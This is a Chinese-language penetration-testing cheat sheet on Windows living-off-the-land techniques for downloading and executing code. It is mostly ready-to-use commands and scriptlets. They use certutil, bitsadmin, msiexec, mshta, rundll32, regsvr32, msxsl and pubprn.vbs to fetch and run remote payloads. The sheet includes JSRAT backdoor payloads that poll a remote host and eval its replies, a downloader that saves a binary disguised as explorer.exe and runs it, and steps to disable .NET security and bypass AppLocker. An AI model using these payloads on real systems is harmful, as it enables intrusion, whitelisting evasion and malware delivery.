Windows执行命令与下载文件总结

1、前言

在渗透或是病毒分析总是会遇到很多千奇百怪的下载文件和执行命令的方法。

2、实现方式

2.1、Powershell

win2003、winXP不支持

$client = new-object System.Net.WebClient

$client.DownloadFile(‘http://payloads.online/file.tar.gz’, ‘E:\file.tar.gz’)

2.2、FTP

ftp 192.168.3.2

输入用户名和密码后

cd E:\file # 进入E盘下的file目录

cd www # 进入服务器上的www目录

get access.log # 将服务器上的access.log下载到E:\file

可以参考：https://baike.baidu.com/item/ftp/13839

2.3、IPC$

copy \\192.168.3.1\c$\test.exe E:\file

2.4、Certutil

可以参考：https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx

应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt

2.5、bitsadmin

可以参考：https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx

    1、bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt
    2、bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt

完整利用:

cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%d90f.exe&%APPDATA%d90f.exe&del %APPDATA%d90f.exe

2.6、msiexec

msiexec /q /i http://192.168.3.1/test.txt

use png

msiexec /q /i http://site.com/payloads/calc.png

calc.png

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png

2.7、IEExec

需要执行两条命令，一条关闭.net安全策略，一条下载
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off

下载exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe

2.8、python

C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”

2.9、mshta

mshta http://192.168.3.1/run.hta

run.hta 内容如下：

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML>

mshta是用来执行hta文件的，经过测试发现，其实没有hta文件，也可以通过mshta来执行命令的，经过几次测试发现mshta不仅可以使用vbscript，而且可以使用javascript来执行命令，整理payload如下：

VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

JSRAT

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

2.10、rundll32

其实还是依赖于WScript.shell这个组件

默认方式

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

Use SCT

regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll

calc.sct:

<?XML version="1.0"?>
<scriptlet>
 
<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
    >
    <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
    <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
    <!-- That should work over a proxy and SSL/TLS... -->
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
     
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
     
        ]]>
</script>
</registration>
 
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
     
    function Exec()
    {
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
    }
     
]]>
</script>
 
</scriptlet>

运行JSRAT:

regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll

JSRAT.sct

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
     
            rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
        new ActiveXObject("WScript.Shell").Run(rat,0,true);
     
        ]]>
</script>
</registration>
</scriptlet>

USE PNG

regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

js.png

<?XML version="1.0"?>
<let>
<registration 
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    < language="J">
    <![CDATA[
	    ps = "cmd.exe /c calc.exe";
        new ActiveXObject("W.Shell").Run(ps,0,true);
    ]]>
    </>
</registration>
</let>

Use WSC

运行计算器

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")

calc.wsc

<?xml version="1.0"?>
 
<package>
<component id="testCalc">
 
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>
 
</component>
</package>

运行JSRAT

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/JSRAT.wsc")

JSRAT.wsc:

<?xml version="1.0"?>
 
<package>
<component id="testCalc">
 
<script language="JScript">
<![CDATA[
        rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
        new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
 
</component>
</package>

2.11、regsvr32

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll

test.data内容：

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);

        ]]>
</script>
</registration>
</scriptlet>

还可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct(COM scriptlet - requires a webserver to stage the payload)

regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

2.12、MSXSL.EXE

msxsl.exe是微软用于命令行下处理XSL的一个程序，所以通过他，我们可以执行JavaScript进而执行系统命令。

下载地址为：

Command Line Transformation Utility (msxsl.exe)

https://www.microsoft.com/en-us/download/details.aspx?id=21714

msxsl.exe 需要接受两个文件，XML及XSL文件，命令行操作如下：

msxsl.exe demo.xml exec.xsl

demo.xml

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>

exec.xsl

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
  
<msxsl:script language="JScript" implements-prefix="user">
   function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
   return nodelist.nextNode().xml;
  
   }
</msxsl:script>
<xsl:template match="/">
   <xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>

同样的，msxsl.exe可以远程加载，具体方式如下：

msxsl https://website.com/scripts/demo.xml https://website.com/scripts/exec.xsl

MSF生成MSI：

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi

命令行运行：

msiexec /quiet /i cacl.msi

将payload放在远程服务器上运行：

https://website.com/payloads/calc.png

2.13、JS下载者

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            var WSHShell = new ActiveXObject("WScript.Shell");
            path = WSHShell.ExpandEnvironmentStrings("%temp%");
            var filepath = path+"/explorer.exe";
            var xhr = new ActiveXObject("MSXML2.XMLHTTP");
            xhr.open("GET","http://x.x.x.x/bd.exe", false);
            xhr.send();
            if (xhr.Status == 200) {
                var fso = new ActiveXObject("Scripting.FileSystemObject");
                var stream = new ActiveXObject("ADODB.Stream");
                stream.Open();
                stream.Type = 1;
                stream.Write(xhr.ResponseBody);
                stream.Position = 0;
                if (fso.FileExists(filepath)){
                   fso.DeleteFile(filepath);
                }
                stream.SaveToFile(filepath);
                stream.Close();
                new ActiveXObject("WScript.Shell").Exec(filepath);
            }
 
 
        ]]>
</script>
</registration>
</scriptlet>

2.14、pubprn.vbs

在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本，其位于C:\Windows\System32\Printing_Admin_Scripts\en-US，仔细观察该脚本可以发现其显然是由用户提供输入（通过命令行参数），之后再将参数传递给GetObject()

"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

test.sct

<?XML version="1.0"?>
<scriptlet>
<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>
</registration>
<script language="JScript">
<![CDATA[
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

3、参考

Bypass AppLocker With MSXSL.EXE

https://evi1cg.me/archives/AppLocker_Bypass_MSXSL.html

Windows下命令行下载文件总结

http://payloads.online/archivers/2017-11-08/1

Bypassing Applocker with msiexec

https://evi1cg.me/archives/Bypassing_Applocker_with_msiexec.html

Exec Commands Via Mshta.exe

https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html

Exec Commands Via Mshta.exe

https://evi1cg.me/archives/Exec_Commands_Via_Mshta.html

JSRAT几种启动方式

https://evi1cg.me/archives/Run_JSRAT.html

windows命令执行漏洞不会玩？ 看我！

http://www.sohu.com/a/199732200_99907709

WSH注入技巧分享

http://www.freebuf.com/articles/system/143957.html

Application Whitelist Bypass using IEexec.exe

https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/